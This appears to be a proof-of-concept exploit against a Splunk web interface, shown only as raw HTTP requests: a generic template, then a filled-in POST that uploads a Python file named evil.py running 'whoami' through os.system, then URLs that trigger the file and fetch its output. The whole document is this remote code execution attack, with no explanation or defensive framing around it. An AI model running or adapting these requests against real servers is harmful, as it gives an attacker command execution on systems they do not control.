POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external
HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>
lookup_external.py&lookup=<file_name>&data=<file_content>
POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external
HTTP/1.1
Host: 192.168.1.100:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
lookup_external.py&lookup=evil.py&data=import+os%0Aos.system%28%27whoami+%3E+output.txt%27%29
<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=evil.py>
<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=output.txt>